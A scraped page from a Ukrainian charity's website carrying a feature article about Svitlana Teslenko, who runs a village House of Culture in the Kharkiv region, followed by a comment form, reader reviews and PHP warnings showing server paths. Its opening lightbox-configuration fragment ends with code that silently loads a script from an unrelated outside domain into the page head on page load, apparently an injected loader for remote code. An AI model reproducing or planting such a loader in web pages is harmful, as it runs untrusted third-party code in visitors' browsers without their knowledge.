, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

СВІТЛАНА ТЕСЛЕНКО: «ЩАСТЯ – ВОНО ПОРУЧ!»

СВІТЛАНА ТЕСЛЕНКО: «ЩАСТЯ – ВОНО ПОРУЧ!»

Зі Світланою Тесленко, яка народилася й живе у селі Юрченкове, що на Харківщині, мене познайомила Світлана Винограденко, землячка моєї героїні, а нині голова правління Міжнародної благодійної організації «МОЗІРОН».

Світлана Тесленко вже ось п’ятнадцять років очолює сільський Будинок культури. – Робота там на високому рівні! А все тому, що Світлана – незвичайна жінка. Її не просто люблять – її обожнюють в селі. Про роботу сільського клубу знають далеко за межами району. Дуже хочу, щоб про неї довідалося більше людей…

Але ж як мене приємно здивувала розмова зі Світланою Тесленко. Зазвичай, мої герої починають розповідати як вони люблять свою роботу. Як мріяли стати… А тут дзвінкий і радісний голос видав у трубку наступне:

– А, знаєте, я щаслива жінка! Я маю чудового чоловіка Олександра й прекрасну сім’ю. У нас двоє дітей: син Володимир і донечка Наталя. А ще маємо невістку і двох онуків!

…Світлана щиро розповідала як закохалася в Олександра, як він відповів їй взаємністю, як зуміли вони зберегти це щастя любові. А коли людина щаслива – вона щаслива в усьому! Вона залюбки йтиме на роботу й випромінюватиме те сонце і тепло, ділитиметься з ближніми. Вона намагатиметься робити світ кращим і добрішим.

Світлана спланувала свою роботу так, аби охопити всі вікові версти населення. Наприклад, в полі зору малеча. В дитячому садку дітки вже знають і чекають, що до них перед Новим роком прийде Святий Миколай з подаруночками. А це віднедавна найменшенькі готуються до неймовірного свята – «Міс» та «Міні Міс» Юрчаночка! Старшокласники готуються до КВК, проводять бали-маскаради. Не забуває Світлана Тесленко і про дозвілля людей старшого покоління. Особливо це відчувалося ось у ці травневі дні. Не оминули увагою матерів, ветеранів. До Дня Перемоги реконструювали пам’ятник визволителям села, поклали квіти, запалили «Свічку пам’яті», згадали поіменно. На сцені Будинку культури влаштували конкурс учасників художньої самодіяльності.

Зараз, коли все убралося у цвітіння: п’янить ароматом бузок, палають полум’ям тюльпани, голубіють іриси… Саме зараз час провести конкурс на кращу садибу «Моя садиба – це квітучий рай!»

Світлана Тесленко ділиться найпотаємнішим:

– Знаєте, зазвичай я завжди люблю людей чимось дивувати, радувати, влаштовувати свята… А тут оце друзі влаштували й для мене незабутній день: написали сценарій до мого ювілейного дня народження! До сліз зворушливо й незабутньо.

А воно в житті, мабуть так і є: як ти до людей, так і вони до тебе. Я із захопленням слухала обох Світлан, яких мені послав Всевишній: Винограденко й Тесленко. Вони щасливі й успішні жінки. У них є спільний індекс щастя – чудова сім’я – їхній власний маленький світ. І, не випадково пригадався Лев Толстой, який починає свій роман «Анна Кареніна» фразою, що стала крилатою, –  «Все счастливые семьи похожи друг на друга…» Та це не означає, що існує якийсь шаблон щасливих сімейних відносин. Єдине, що об’єднує всі щасливі сім’ї – це розуміння, повага та підтримка між її членами. І саме в цьому, мабуть, універсальний рецепт сімейного щастя для всіх.

Людмила ЧЕЧЕЛЬ

 

 

Добавить комментарий

Почта (не публикуется) Обязательные поля помечены *

*

Captcha Captcha Reload

Вы можете использовать эти HTML теги и атрибуты: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Вы можете добавить изображение к Вашему отзыву нажав здесь.

TRANSLATE

Russian to English Russian to German Russian to French Russian to Spanish Russian to Italian Russian to Japanese Russian to Chinese

Новости и События

Отзывы

 • Детская спортиная школа "Колос"

  Шановна Світлана Володимірівна! [img]http://moziron.org/wp-content/uploads/2016/12/viber-image_1.jpg[/img]
  Читать полностью...
  Оставлен 23 Дек 2016
 • Білоколодязький НВК

  Шановна Світлано Володимирівно! Вісловлюю вам щиру подяку за активну громадську позицію , вагомий внесок...
  Читать полностью...
  Оставлен 15 Дек 2016

ФОТОГАЛЕРЕЯ


Warning: array_merge() [function.array-merge]: Argument #1 is not an array in /home/elasto/moziron.org/www/wp-content/plugins/picasa-widget/picasa-widget.php on line 48

Warning: array_merge() [function.array-merge]: Argument #2 is not an array in /home/elasto/moziron.org/www/wp-content/plugins/picasa-widget/picasa-widget.php on line 48

Видео

 

Наши партнеры

Бориспільський дошкільний навчальний заклад (ясла-садок) комбінованого типу №2